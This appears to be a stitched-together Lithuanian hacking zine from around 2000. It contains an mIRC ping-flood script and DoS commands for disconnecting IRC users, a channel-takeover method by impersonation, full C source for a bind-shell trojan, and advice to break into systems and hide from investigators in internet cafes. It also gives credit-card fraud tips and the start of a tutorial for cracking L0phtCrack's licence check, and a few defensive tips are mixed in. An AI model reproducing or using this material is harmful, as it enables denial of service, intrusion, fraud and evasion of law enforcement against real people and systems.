nera . (atejtyje galbut parasysiu ir detalesni

script’u darymo tutorial’a (na jej bus norinciu))

レトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトソ

ウ [[4]] chiuvakas kaska negero pasake ? nori kersto ? ウ

ウ atjungiam chiuwaka ? (ir kajp nuo to paciam ウ

ウ apsisaugot) ウ

タトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトル

shiaip tokiaijs dalykajs nepatariu uzsiiminet .

taj yra lameriska . bet kartais buna tokiu atveju

kaj buna px ant wisko ir tiesiog norisi pamokyt

chiuwaka . tokiu atveju pirma ka reikia padaryti

priesh karo veiksmus taj ishsiaiskint ant kiek tas

chiuvax kietas . darom “/ctcp [chiuvako nick] version”

ir laukiam atsakymo . tajgi gavom atsakyma pvz :

mirc v5.81 (kuo senesne tuo geriau ) ir viskas

nereiketu rautis ant tu pas kuriuos gaunat atsakyma

BichX v.(nesvarbu kokia) ar kaska kas susije su UNIX

(linux . openbsd . ir t.t. nes greiciausiaj nieko

neisheis 😉 . taipogi nepatarciau prasideti su

chiuwakajs ish kuriu gavot pvz : mirc v.(nesvabu) ir dar

gavot kokianors skripto reklama pvz :

[ agurkaz-script by mr2 ] [ http://mr2lt.cjb.net ]

(chia mano skripto varijantas) . nes papraschiausiai

vilties pamokyt toki chiuwaka mazaij . (nors shiaip .

manes karta paprase kad ishmeginchiau jo script (dabar

tixliaj nepamenu koki script) . ir jis luzho zymiaj

greiciau nej zmogus be script . o shiaip atjungsi

chiuwaka nuo servo ar ne dar labaj priklauso nuo tavo

ineto beij jo ineto rysio . tajgi ishiaiskine

chiuwako “kietumo lygi” 😉 ir nusprende ji issabacint

ish servo . pvz : parsisiunchiam agurkaz-script (ish

http://mr2lt.cjb.net) . spaudziam “klonuotiz” ir

prijunge antra mIRC’a prie servo imames chiuwako

mirties . zodziu spaudziam fludaz/ping fludaz

(shis mano (ir netik) nuomone veiksmingiausias) gaunam

“musu tajkinyz ?” irasom musu aukos nick .

“kiek pingu siusim ?” irasom pvz : 1000 (shiaip uztenka

apie 200 . bet tikrumo labuj) . “laikaz (sekundem)

tarp [ping] ?” irasom pvz : 2 (nemaziau 2-ju . o

shiaip wiskas priklauso nuo jusu ineto ryshio

kokybes . kuo prastesne tuo labiau didint .) tik

shikart nespaudziat ok . wiska tapati pasidarot ir

kitame jau paleistam mIRC’e ir viena po kito (abiejuose)

paspaudziat ok . ir pradedat stebet kas vyksta .

stebit ping reply . kur ping reply laikas turetu vis

didet . ir po shiek tiek lajko “blogiukas” padaro

quit (excess flood) 😉 (kad padarys luzhau galima

tiketis gavus ping reply laika . apie 40sek .

ir daugiau . o kartajs ir maziau .) kaj chiuwakas

luzhta . arba pvz : tau niekajp nepavyksta jo

atjabalint . tiesiog sustabdom fluda .

fludaz/sustabdyt visuz fluduz .

tapati galima padaryt i aliases irasius pvz :

/fludazzz {

.set %tajkinys $$?=”musu tajkinys ?”

.timer10 $$?=”ping sk. ?” $$?=”laikas tarp ping ?” /ctcp %tajkinys ping

}

/stopfludazzz {

.timer10 off

}

ir tada norint fludint reik parasyt “/fludazzz” komanda .

o norint nutraukt ping fluda “/stopfludazzz”

(na norint totaliaj pasitychiot ish lamuxos . atjunge

ji pasikeiskit savo klono nick y jo . sugryzes chiuwakas

dar ilgaj stebesis “kas chia do veikejas tokipati nick kajp

mano sugalvojo ? ir dar klausia ‘kaijp sekas lama ? ;)’ ?!?”)

kaip visa taj vyksta ? . ogi paprastaj : servas paprastaj

supyksta jej kaskoks “kenkejas” pradeda be skaiciaus siust

ctcp’us ir jej pvz : “laikaz (sekundem) tarp [ping] ?”

irasytumet pvz : 0 . shiuo atveju servas jus atjungtu

(kaijp kenkeja) parasydamas excess flood . o kaij jus

kaskam siunciat ping’us . tas kaskas i juos atsakineja

pong’ais ir servas supykes uzh vienu metu siunchiama dideli

kieki pong’u ji atjungia . (tam kad greiciau atjungt kokitaj

chiuwaka ir patariama pasidaryt keleta klonu . nes ping’us

tada siuncia keli irc klientaj . o pong’ais atsakineja

vienas 😉

tiesa nevisada ping’inamas chiuwakas atjungiamas (excess flood)

yra ir kitas bajeris (tiesa rechiau suveikiantis) . reiskias

jus pastoviai siunciat tuos ping’us (ish 2-ju ar daugiau klonu)

ir kaijp iprasta servas karts nuo karto siuncia PING “paketa”

t.y. kaskokitaj skaiciu . irc klijentas gaves shi “paketa”

siunchia servuj PONG “paketa” tapati skaiciuka koki gavo .

taj daroma tam kad servas zinotu “esi gyvas ar nebera taves ?”

. ir kaj chiuwako irc klijentas beatsakinedamas i tavo

siunchiamus PING’us pervelaj atsako servuj . servas pagalvoja

kad irc userio nebera . ir nesvarbu yra jis ar ne ji

papraschiausiaj atjungia parasydamas ping timeout (shitas bajeris

suveikia tik tada kaj chiuvako kuri pinginat : senas kompas .

blogas rishys . zodziu kaj chiuwakas ir tajp netoli mirties ir

tereikia truputi jam padet 😉 ) .

na o pamacius kad visa taj daroma su jumis (jus auka 😉 ) .

tiesiog papraschiausiaj reikia uzdeti tam chiuvakui ignora

(komanda : “/ignore [nick’as]”) . (daugelyje skriptu taj

darosi automatiskaj . kaj chiuwakas per tamtikra laika

padaro tamtikra skaiciu ctcp . kad ir pvz : (mano)

agurkaz-script’e)

tapati galima padaryt i remote irasius pvz :

CTCP *:*:* {

if ( %ctcppro. [ $+ [ $nick ] ] == $null ) {

.set %ctcppro. [ $+ [ $nick ] ] 1

.timer 1 10 unset %ctcppro. [ $+ [ $nick ] ]

goto pabajga

}

elseif ( %ctcppro. [ $+ [ $nick ] ] == 1 ) {

.set %ctcppro. [ $+ [ $nick ] ] 2

.timer 1 10 unset %ctcppro. [ $+ [ $nick ] ]

goto pabajga

}

elseif ( %ctcppro. [ $+ [ $nick ] ] >= 2 ) {

.ignore $nick

.echo -a 10[*] $nick katik isbande (mass) ctcp apsauga

.unset %ctcppro. [ $+ [ $nick ] ]

goto pabajga

}

:pabajga

.halt

}

ir tam kad variables nesirinktu siuksliu .

options/irc/perform/ uzaktyvuoji (varnele)

“on connect,perform these commands :” ir irasaj :

“/unset %ctcppro*” komanda . spaudi [OK]

ping fluda galima daryt netgi pasinaudojus dos’u pvz :

dos’e rasom :

“ping [chiuwako kompo IP]” (chia reikia zhinoti chiuwako

kompo IP adresa . jis suzinomas “/dns [nick’as]” komanda

sia komanda pingas siunchiamas viena karta .)

“ping -l 2800 -t -w 2000 [chiuwako IP]” (staj shia komanda

ir galima atjungt chiuwaka . (nesigilinsiu y tixlumus .

jej norit detaliau . tiesiog parasykit dos’e “ping” ir

gausit gana ishsamia informacija .)) toliau pakalbesiu apie

DOS ataka (nemaisykit dos operacines sist. su Denial Of

Service ataka 😉 )

na zinoma taj ne pac geriausias budas kanors atjabalint

nuo irc servako . kalbu apie DOS (denial of service)

ataka . bet ping fludas manychiau pac populiariausias

tarp irkininku 😉 . apie DOS atakas daug nekalbesiu

(shiaip nuo shios atakos jau gana senaj buvo luzhes net

pac www.microsoft.com na o netajpjau senaij (jej zhiurit

te-ve) nuo jos nukentejo ir www.yahoo.com bej keletas

kitu ineto gigantu 😉 (tiesa uzhpuolikas buvo susemtas

(mafiaboy berods)) ) shi ataka kajp jau supratot yra

gana daug qr naudojama (paprastaj destrukcijos tixlais)

. shios atakos pasekmes neprognozuojamos taj galibut

pradedant nuo paprasto kompo pakibimo iki “format c:”

(zodziu priklauso ant kiek jusu kompas supsixuos)

zodziu naturaliaj inete viskas vyksta taijp : jusu kompas

siunchia kitam kompuj SYN “paketa” t.y. prasyma

prisijunkti prie kito kompo (chia pvz: ftp http telnet)

. kompas (servas) gaves SYN tuojpat siunchia jums

atsakyma ACK “paketa” t.y. patvirtinima apie SYN

uzklausa jusu kompas prisijungima su kitu kompu

uzhtvirtina nauju ACK “paketu” (shio ACK servas laukia

keleta min. sek. ir jej negauna ACK (ish jusu) ishmeta

ish whaitlisto) . na o dabar isivaizduokit kas darosi

jej jus vienu metu uzhplustat serva vien SYN “paketajs”

ir neatsakinedami prisijungima patvirtinanchiais ACK .

ogi dideja servo waitlistas . niekas negali prisijungt

prie servo (jis apkrautas) . ir tarkim jej jus puolat

shi kompa ish keliu kompu vienu metu ankschiau ar veliau

jis padaro “luzhau” (tas pac www.yahoo.com pavizdys)

panasiu principu atakuojami netik servaj bet ir paprasti

kompaj . zodziu apie mIRC’a . pac populiariausias shiu

laiku nuke’ris beabejo “click v2” ji galite parsisiusti

beveijk ish kiekvieno uzhsenietishko servo (daznaj buna

platinamas kartu su mIRC skriptajs) . jis veikia DOS

atakos principu zodziu pasirenkat auka . darot

“/dns [nick’as]” . status lange sulaukiat

“resolved *.*.*.*” (vietoj ->*<- skaiciukaj pvz: 127.0.0.1)

taj yra chiuwako kompo IP adresas (jej gavot

“unable to resolve” tada pysy-propalo . geriau

pamirskit ji) . ji irashot y betkokio nukerio “IP”

langeli ir vaziuojam . laukiam kol chiudikas “mirs” 😉

na beabejo nuo to yra apsaugu pvz : nukenabber . bet

shio dajkchiuko paprastaj niex naudoja (tie kas nori

apsigint nuo visokiu DOS (be DOS dar yra pvz : Smurf .

Land&Teardrop (visu veikimas panasus)) ataku paprastaj

turi pasistate FireWall’us ir ju su shitom atakom nepaimsi ;))

レトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトソ

ウ [[5]] lameriska instrukcija TAKEOVERINKUJ 😉 ウ

タトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトル

tajgi tajgi . tu esi visiskas lama (ar tiesiog gera

nuotajka ir nori pasilinksmint (pagazdint vargsus irc

userius)) (nepagalvokit kad taj darau nuolat (bet

yra buve (neslepsiu)) . shis pamokymas kajptik tau .

pirma ka reikia padaryt besiruosiant teikoverint kanala

aisq reijkia (apgalvotaj) pasirinkt taikini . reiskias

rasaj “/list” ir lauki kol list lange pasirodys visi tuo

metu esami kanalaj . renkiesi nej dideli nej maza .

kokiu 5-9 zmoniu kanala (chia pagal skoni 😉 )

!!!neuzejni i ji!!! . tau pvz : patiko #lamers kanalas

rasaj “/names #lamers” ir status lange pamataj chiuwaku

sedinciu shiame kanale sarasa . !!!patarimas-ispejimas!!! :

kanale kuri pasirinkaj turetu sedeti keli zmones turintys

o’pus (@) t.y. tau reikes bent keliom sekundem atjungti

viena ish ju . ir po vieno ish ju luzhimo kanale turi

likt bent vienas zmogus su @ . t.y. ne botas . ne klonas

nes jis (jej kvailas ir nesupranta kas yra excess flood .

palaikes tave savo draugu) ir turi tau duoti op’a .

kurio tau ir reikia norint takeover’int kanala . toliau :

jej pasirinktam kanale sedi @rkp shita kanala geriau pamirsk 😉

pasirinkus kanala ir chiuwaka kuris tures trumpam luzhti daraj :

“/ctcp [nickas] version” (zodziu kad nesiplesciau pasakysiu

kad reikia ji atjungti nuo irc nors keliom sekundem .)

(apie taj rasiau truputi ankschiau . (jej shizofrenija

sergi)) ji atjungus nuo servo stajgiai keiti savo nick’a i

jo nick’a (tam reijketu iskart pasiruost) ir uzeini y

(musu atveju) #lamers kanala . tada jej pasiseks to

chiuwako draugaj kuri tu katik atjungej tau duos op’a ir poto

manau tu pac zhinaj ka reikia daryti 😉 (massdeop . zodziu

tu turi likt vienas turintis @ priesh savo nick 😉 ) ir tada

daraj kanori su perimtu kanalu . o vargsaj apgautieji tik ir

spjaudos keiksmais . grasina nukeriu . ping fludu 😉 (na jej

esi tikras lama aisq greitaj padaraj luzhau . ir buni

itrauktas tu chiuwaku shitlist’us (sudziu sarasus))

na o norint nuo to apsisaugot . reikia tiesiog but

atidesniais . pamacius quit(excess flood) reiketu isitikint

kad gryzo jusu draugas ir jej esat jums brangiam kanale be rkp

geriau pasisaugokit . (man paciam buvo bajeris kaj 2-se susikurem

nuosalu kanala ishbandyti mano script . uzhejo chiuwakas davem

jam op’sa o tas 2-viem savaitem bota su invite only pastate

(kanalo aisq negajla . laikinas buvo) bet pamokele gera 😉 )

taipogi neuzdejinet autoOPo kad ir net paciam geriausiam drauguj

pagal nick’a . (maza kas gali atsitikt . sugalvos kox loxelis

nick’a kaijp tavo draugo pasiimt ir uzheis netycia y kanala .

gaus op’a ir priximicins)

レトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトソ

ウ autorius : mr2 ウ

ウ data : 2000 ウ

ウ url : http://mr2lt.cjb.net ウ

ウ @mail : mr2@xxx.lt ウ

タトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトル

(shi straipsneli leidziu laisvaj platinti inete be mano leidimo tik

butu labaj grazu kad jo turinys nesikeistu . o del gramatiniu

klaidu nepykit (ne spaudaj ji parashiau 😉 ) jej aciras norinciu kad

parasychiau tutorial’a apie mIRC skriptu rasyma . ar norinciu

patart . pataisyt . papildyt shi TUT . mano @mujla zhinot)

(mIRC’e mane galit rasti pvz : #mr2 kanale nick: “mr2” arba “agurkaz”)

21. Kaip nesielgti hakinant

Kaip nesielgti Jus taip nedarykite Vasara del savo neismanymo nukentejo daugelis Lietuvos svetainiu: centras.lt search.lt ir kitos, kuriose buvo skelbimu lentos ar guestbook`ai. As maniau, kad tai buvo gera pamoka ju administratoriams, bei visiems kitiems. Bet pasirodo as klydau. Viena diena, narsydamas www ir sededamas IRC radau nuoroda i viena idomu puslapi: www.satan.lt – juodosios brolijos puslapis. Uzsukes i ji ir perzvelges, sumaniau uzsukti i guestbook`a ir pagirti saita. Uzsikrovus guestbook`ui pamaciau kazka panasaus i tai: galima ivesti html komandas. Pvz: vietoj [ENTER] galima rasyti
. Ir ka jus apie tai manot??????????? Ar tai ne administratoriu klaida, baisi klaida? Bet, pagalvojau as, gal jie nors JavaScrip filtruoja? Tad as emiau ir isbandziau tai. Paprasciausiai irasiau prie savo girtino/peiktino teksto keles eilutes: ; beto idejau nuoroda i uid0 saita: Aisku as galejau visiskai sudirbti si saita: JavaScript pagalba galejau atidaryneti, uzdarineti langus, bei daug daug kitko, iterpus nuoroda i file:///con/con/ galejau nukepti visus win 9.x vartotojus, kurie ten uzklystu. Bet as taip nesiilgiau. As paprasciausiai padariau tik ispejima puslapio webmaster`iui. Kur sio dokumento vertes objektas? Viena kart ismokite daryti tai gerai, ismokite mokytis ne tik is savo bet ir is kito klaidu. Filtruokite savo chat`uose, guestbook`uose, mesage bourde`uose ir kitur kur lankytojai gali ivest teksta (ir jis bus spausdinamas html dokumente) visus HTML tagus, neleiskite vykdyti JavaScript, VisualBasic ir pan. Narsykite www tik isjungia Java. Taip jus isvenksite Java/JavaScript ataku. P.S. As tai nelaikau tikru hackinimu, tai paprasciausiai.

22. Kaip tapti hakeriu

Pirmiausia, manau, apsispresk ar tikrai nori buti hackeriu, nes:

1. Hakeriavimas yra nelegalus (bent daugelyje valstybiu [Lietuvoj kolkas ne]). Netgi tuose valstybese, kuriuose hakerevimas nera antiistatimiskas hakeris vistiek pazeidzia dauguma istatymu. Pvz.: asmens teise i privatuma (E-mail, www, acount ir kt.).

2. Hakeriavimas nera lengvas uzsiemimas, tu turi vis ieskoti ir ieskoti daug info apie naujausius exploitus (arba kaip tikras hakeris juos paciam daryti), ieskoti sistemu klaidu etc. Todel hakervimas dar ir daug laiko uzimantis uzsiemimas. Negalima per savaite tapti hakeriu. Tai pat negalima dometis tuo puse metu ir poto padarius pauze vel gristi. Ne, tu paprasciausiai per daug atsiliktum. Ne taip negalima!

Negalvok, kad filmuose apie hackerius, kopmiuteriu piratus etc rodoma tiesa. Negalvok, kad hakeris koks herojus, gebantis prikirsti visas paneles, dirbantis geroje firmoje etc. Priesingai- ar tau patiktu matyti savo artimuosius, draugus verkencius, liudincius kai tave sujima teisesauga, VSD (valstybes saugumo departamentas).

Bet jai vistiek apsisprendei tapti hakeriu tai pradek kuo greiciau, nes sis informasinis pasaulis keiciasi taip greit, kad nekiekvienas geba ji pasivyti ir neatsilikti.

1.Kaip pradeti?

Daugelyje interneto sistemu stovi UNIX, LINUX, FreeBSD, NetBSD, vienu zodziu, *NIX. Tad norint pradeti hakinti reikia ismokti tai. Aisku negalvok, kad nereikia ismokti windows`u. Priesingai, juos irgi reikia ismanyti. Jei nezinojai yra net ir speciali windowsu versija (distribucija ar pan) skirta serveriams. Tai windows NT.

Taigi griskime prie *NIX. Gauk kokia tai *NIX distribucija, instaliuok ja ir pradek mokytis. Kaip mokytis *NIX? Pradziai gauk pora knygu, tokiu kaip “Linux zaliems” ar pan. Perskaityk jas. Poto imk ka nors rimciau. dalyvauk konferencijuose kuriose snekama ape *NIX. Priprask prie *NIX. Paprogramuok juose. Ismok gerai konfiguruoti sistema. Automatizuok savo veiksmus darydamas skriptus. Ismok *NIX`e (ir netik ten) naudotis internetu (E-mail, telnet, ssh, www, ftp, irc, icq ir kt.). Jei ko nors nezinai nepulk klausineti visu. Paprasciausiai RTFM (read the fucking manual). Niekada negalvok, kad *NIX`e viska jau ismanai.

Na daba jau tu ismanai pakankamai apie *NIX. Gauk savo tikra (ne localu) acounta.

Narsyk www, siurb visa info apie hakinimo metodus, nauja programine iranga, jos klaidas (bug`us). Stenkisc pats rasytis exploitus. Tam turi ismokti keleta programavimo kalbu: c/c++, perl, java.

Prisiregistruok prie ivairiu hakeriu konferenciju, naik i pora IRC serveriu- ten rasi bendraminciu,galesite pasidalinti info ar pan. Nepralesk pro akis nei vieno hack saito.

Ismok neikliuti! Nes kai ikliusi bus per velu! Kaip neikliuti skaityk straipsnyje paranoja.

Ieskok pazeidziamu sistemu ir hakink jas. Tavo tikslas gauti kuo daugiau acount`u is kuriu galetum hakinti kitas sistemas.

Ir jei tu viska darai, kaip parasyta cia- tada gali tapt hakeriu.

23. Kaip veikia trojanai

Cia pabandysiu paiskinti kokiu principu veikia trojanai, kaip jie rasomi etc.
Imkim ir panagrinekim paprasciausia trojana parasyta C kalba:

#include <stdio.h> // iterpiamas standartinio I/O funkciju headeris
#include <errno.h> // klaidu
#include <signal.h%gt; //signalu. Nezinot kas tie signalai? Tai kaip jus naudojates kill programa?
#include <stdlib.h>
#include <netinet/in.h> // iterpemi visi headeriu failai reikalingi dirbti su tinklu, socket ir pan.
#include <sys/types.h>
#include <sys/socket.h>
#include <strings.h> // darbui su eilutem

// Nusirodyk koki tavo trojanas porta naudos, naudok koki standartini- gali lama adminas pamirses sumaisyt su kokiu ftp_data (20 portas) ar pan
// Kitu atveju naudok koki kita porta kuris maziau stebimas
#define P 12345 // ant prikolo imam netbus porta

#define SH “/bin/sh” // nusirodai koki shella naudos tavo trojanas
#define LISTN 5

int main(int argc, char **argv)
{

//pasveikinimo (welkome) zinute
char *fst = “nConnected!nn”;
char *sec = “This tool demonstrated how works trojansn”;
char *thr = “Please enter each command followed by ‘;’n”;

int outsock, insock, sz; //soketu deskriptoriai, ir pagalbinis kintamasis, kuris saugos eiluciu dydi (size)

//reikalingos dvi soketu sructuros (irasai) in ir out
struct sockaddr_in home;
struct sockaddr_in away;
//set port, proto and bzero for BIND
home.sin_family=AF_INET;
home.sin_port=htons(P); // atkreipk demesi cia nurodomas taviskis portas
home.sin_addr.s_addr=INADDR_ANY;
bzero(&(home.sin_zero),8);

signal(SIGCHLD,SIG_IGN);

// pats idomumas prasideda
if((outsock=socket(AF_INET,SOCK_STREAM,0))<0) // ar su soketais viskas ore
exit(printf(“Socket errorn”));

if((bind(outsock,(struct sockaddr *)&home,sizeof(home))<0)) // ar bindina ore
exit(printf(“Bind errorn”));

if((listen(outsock,LISTN))<0) //ar listina
exit(printf(“Listen errorn”));

sz=sizeof(struct sockaddr_in);

// jo cia tai tikrai strukturinis programavimas
for(;;) // o rimciau tai amzinas ciklas
{
if((insock=accept(outsock,(struct sockaddr *)&away, &sz))<0) //laukiam isoriniu signalu, tuo paciu tikrinam ar nera klaidos
exit(printf(“Accept error”));
if(fork() !=0) //jei sukuriam, dukterini (child) procesa
{
send(insock,fst,strlen(fst),0); // siunciam sveikinimo zinute
send(insock,sec,strlen(sec),0);
send(insock,thr,strlen(thr),0);
dup2(insock,0); // nukreipem STDIN (file deskriptos=0) i soketa
dup2(insock,1); // nukreipiam STDOUT (file deskriptos=1) i soketa
dup2(insock,2); // nukreipiam STDERR (file deskriptos=2) i soketa
execl(SH,SH,(char *)0); // paleidziam savo shella
close(insock); // uzdarom soketa
exit(0); // stai ir baigesi musu sudetingas trojanas.
}
close(insock); // jei nejo sukurt dukterinio proceso (ziureti fork() ) tai uzdarom ansyk soketa ie einam lauk.
}
}

Stai taip atrodo pats elementariausias trojanas. O jus turbut manete, kad tai sudetinga. Siaip sis trojanas ira gan blogas. Jei norite gero trojano eikit i
http://packetstorm.securify.com
ir isten temkit r00tkit`a. Siuo metu as kaip tik apsistojes ties trojanu rasymu, kai parasysiu koki krutesni imesiu. Tad laukite.
Kas sake kad lietuviai trojanu neraso?

Kaip anonimizuotis kitu budu/keliu
By Whisperer // whisperer@worldmailer.com for www.underground.lt

Visi nori anonimizuotis. Visi privalo anonimizuotis jeigu uzsiima ne tik narshymu po puslapius apie geliu auginima, o daro ka nors nelegalaus. Populiariausias budas proxy servai. Tachiau su vienu nieko nepadarysi. Jeigu tikrai nori gerai anonimizuotis turi susijungti i grandine proxy1>proxy2>proxy3 etc. Dar geriau jeigu tie proxiai kinietishki, japanski ar dar kokie (sunkiau susisiekti su ju adminais ir gauti tavo ip adresa)
Tachaiu sparta ziauriai, ziauriai krenta. Ir norint patekti i vilniu ish kauno gaunasi vaziavimas per klaipeda. Ash siulau kita buda. Mieste pilna (bent jau Kaune) visokiu internet’o kaviniu ir t.t. Kai kurios labai nuoshalios ir ten tam tikrom valandom nebuna daug zmoniu (pvz. Sonex’as savanoriu prospekte prie Juzes). Mokestis iki 6 lt uz valanda. Ateini, atsineshi savo irankius, savo reikalinga infa, pasedi valandele, nuhackini ka nors ir pasishalini. Atseks ip adresa nuhackinto servo adminai ir bus jiems ledas. Aishu jeigu nori galima ir ish ten jungtis per kelis proxius (paprastai tokiose vietose ryshys boona geresnis nei per dial-up’a) ir “nuskriausti” adminai tures dar daugiau vargo. Mazai tiketina kad zmogus prileides tave prie interno atsimins ir gales nupasakoti tavo ishvaizda, o tavo duomenu jis nezinos. Aishku nebookit durniai neikit antra kart i ta pachia vieta.

kam daryti sunkiau jei galima lengviau?

2000(c) by Whisperer // whisperer@worldmailer.com

24. KREDITINES KORTELES

Parenge: MG, 1999, Kaunas
Pagal: ‘Credit Carding’ by David Lightman and ‘The Administration’

Kreditines korteles turi mazhiausia 3 apsaugos priemones, kuriu jus
neturetumete iveikti. Tai yra saskaitos numeris, parasho laukas ir
magnetine juosta.

Saskaitos numeris
——————

Telefono numeris kartu su miesto kodu turi 8 skaiczius, asmens kodas – 11.
Tacziau pilnas MasterCard kreditines korteles saskaitos numeris turi 20
skaicziu. Kam tiek daug?
Matematishkai kreditines korteles numeriui pakanka ashtuoniu skaicziu.
Kiekvienas korteles savininkas, be abejo, turi tureti unikalu,
nesikartojanti numeri. Kompanijos Visa ir MasterCard turi mazhdaug po
65 mln. klientu kiekviena. Taigi ju numeracijos sistemos turi sutalpinti apie
65 milijonus imanomu numeriu.
Egzistuoja shimtas milijonu imanomu kombinaciju ish ashtuoniu skaicziu:
00000000, 00000001, 00000002, 00000003, .. iki 99999999. Taigi, ashtuoniu
skaicziu visishkai pakanka. Ateities augimui numatyti, saskaitos numeriui
pakaktu devyniu skaicziu, kas uzhtikrina milijarda skirtingu numeriu.
Faktishkai, Visa kortele turi 13 skaicziu, American Express – 15, Diners
Club korteles – 14, Carte Blanche – 10. Abejotina, kad kredito kompanijos
planuoja tureti visus shiuos milijardus klientu ir suteikti jiems
skirtingus numerius. Shie papildomi skaicziai reikalingi saugumo
sumetimais.
Tarkime, jusu Visa korteles numeris yra 4211 503 417 268. Kiekvienas
pirkinys turi buti ivestas i kompiuteri ish prekybos terminalo. Saskaitos
numeris susieja pirkini su jusu saskaita. Asmenys, ivedantys saskaitu
numerius i kompiuteri gali kartais suklysti ir ivesti pvz. 4211 503 471 268
arba 4211 703 417 268. Taigi shios trylikos skaitmenu numeracijos sistemos
privalumas yra tas, kad tikimybe, kas kitas klientas tures saskaitos numeri
atitinkanti 4211 503 471 268 arba 4211 703 417 268 labai mazha. Egzistuoja
10 trilijonu imanomu trylikos skaitmenu Visa numeriu (0000 000 000 000;
0000 000 000 001; ... 9999 999 999 999). Tik apie 65 mln ish ju yra
tikri, egzistuojantys saskaitu numeriai. Tikimybe, kad klaidingai ivestas
korteles numeris atitiks egzistuojanti numeri yra kazhkas apie 1 prie
150 000. Kitos korteliu numeracijos sistemos yra dar saugesnes. Ish
kvadrilijono imanomu penkiolikos skaitmenu American Express korteliu
numeriu tik 11 milijonu yra naudojami. Tikimybe kad atsitiktinai surinktas
numeris atitiks egzistuojanczios saskaitos numeri yra mazhdaug 1 prie
90 000 000. Imant visus 20 MasterCard numerio skaitmenu, yra kvintilijonas
(100 000 000 000 000 000 000) imanomu numeriu 65 milijonams klientu.
Galimybe atitaikyti numeri czia nevirshija vieno prie pusantro trilijono.
Be kita ko, tokia sistema suteikia galimybe ‘neakivaizdinei’ prekybai,
apmokant kreditinem kortelem. Pvz., kai TV-reklamos siulo skambinti ir
uzhsisakyti kokia nors preke telefonu, operatores, kurios priima uzhsakymus
negali matyti nei kreditines korteles, nei jos savininko parasho. Kaip jos
gali zhinoti, ar skambinantysis ishvis turi kreditine kortele?
Jie grindzhia savo pasitikejima kreditiniu korteliu numeracijos sistemos
saugumu. Jeigu kas nors skambina ir panaudoja ishgalvota numeri, shis
numeris, tikriausia, neatitiks egzistuojanczios saskaitos numerio. Ar toks
numeris egzistuoja ar ne, galima patikrinti labai greitei, pasijungus prie
kredito kompaniju kompiuteriu. Visais praktiniais tikslais, naudojant leva
kreditkes numeri, yra vienintelis budas – nuskaityti ji nuo
egzistuojanczios kredito korteles. Plastiko gabaliukas nera butinas, pakanka
numerio.

Parasho laukas
—————

Jus negaletumete ishtrinti parasho korteleje, jeigu gaunate leva
kreditke. Jeigu jus ar kas nors kitas megintumete tai padaryti, greit
isitikintumete, kad kortele tampa visishkai nebetinkama naudoti, (bent jau
jos jau negalima rodyti). Kai kurios korteles turi specialu parasho lauko
pagrindo dizaina(linijini ornamenta), kuris nusitrina, jei kas nors bando
ishtrinti parasha, paliekant balta plema. Ant kitu, bandant ishtrinti
parasha, pro pazheista parasho lauko pagrinda pasirodo zhodis ‘VOID’,
zhymintis korteles netinkamuma naudoti.

Budas apeiti shia saugumo priemone
Jeigu parasho laukas neapsaugotas linijiniu ornamentu arba sunkiai
atkartojama spalva, parasho lauka galima uzhdazhyti.

Magnetine juosta
—————-

Daugelis mano, kad magnetineje juostoje uzhkoduota daug informacijos
apie korteles savininka, arba apie saskaitos balansa. Realiai, joje
neimanoma irashyti daugiau, nei i panashaus ilgio garso kasetes juosta.
Ishtikruju magnetineje juostoje pakanka irashyti saskaitos numeri ar
kitokia identifikacijos priemone. Bet kokia kita informacija, reikalinga
pinigu pervedimui atlikti, tokia pvz. kaip saskaitos balansas, gali buti
ishtraukta ish banku kompiuteriu ir nera reikalo kodoti jos paczhioje
korteleje. Ta pati galima pasakyti del informacijos apie korteles
savininka. Be identifikacijos, magnetineje juostoje gali buti irashyta
galiojimo data, nes bankomatai kartais ‘prarija’ kortele, kai jos galiojimo
laikas pasibaiges, netgi jeigu balansas yra tvarkoj.
Informacija magnetineje juostoje galima ishtrinti palaikius virsh jos
stipru magneta.

25. L0phtCrack v2.5 krekinimas

Info:
Autorius: PauliuZ (pauliuz@xxx.lt, www.pauliuz.cjb.net)
Irankiai: SoftICE, WinDasm, UCOL Patch Maker, Betkoks šešioliktainis redaktorius
Taikinys: L0phtCrack v2.5 (www.l0pht.com/l0phtcrack)

Intro:
Šis tekstas yra skirtas tiktai mokslo tikslams ir teksto autorius neatsako už netinkamą jo naudojimą! O dabar jau galime pradėti.

Pora sakinių:
Būtų gerai, kad jūs turėtumėte bent „žalią” supratimą apie SoftICE, WinDasm, šešioliktainį redaktorių ir asembler kalbą. Bandysiu paaiškinti bent jau pagrindines SoftICE klavišų kombinacijas ir jos suderinimą.

Suderinimas:
SoftIce yra paleidžiama iš autoexec.bat paskutineje eilutėje įrašius: [kelias iki SoftIce]winice.exe. Pvz.: C:SoftICEWinIce.exe, todėl SoftIce pasileidžia kraunantis windowzei.
Taip pat reikia suderinti ir winice.dat failą. Pateiksiu winice.dat failo fragmentus, kurie turi buti (daugtaškiai reiškia praleistas vietas):
.
INIT=”CODE ON; X;”
.
EXP=c:windowssystemkernel32.dll
EXP=c:windowssystemuser32.dll
EXP=c:windowssystemgdi32.dll
.
Kombinacijos:
Ctrl+D – įeiti į SoftICE;
F5 – įšeiti iš SoftICE;
F10 – vykdyti programą po vieną eilutę;
F8 – jeigu esame ant procedūros, įeiti į ją.
Visus įrankius galima atsisiųsti iš http://ucol.home.lt/cgi-bin/ucol.pl?l_tools.

Krekinimas:
Pirmiausiai reikia nukopijuoti failą l0phtcrack.exe į kokią saugią vietą (to reikės vėliau). Dabar paleidžiame pačią programą (L0phtCrack), spaudžiame mygtuką „Register” ir lauke „Unlock code:” įvedame betką ir žiūrime į iššokusią žinutę: “You have entered an invalid code. Please try again”. Dabar įeiname į disasemblerį (WinDasm). Atidarome failą l0phtcrack.exe (jis yra krekinamos programos direktorijoje). Vykdome paiešką pagal matytą žinutę: “You have entered an invalid code”, t.y. einame į WinDasm meniu sklitį „Search” ir vykdome komandą „Find Text”. Lauke „Find what:” ir įvedame tą žinutę. WinDasm lange atsiduriame čia:
.
:0040635F 52 push edx
:00406360 50 push eax
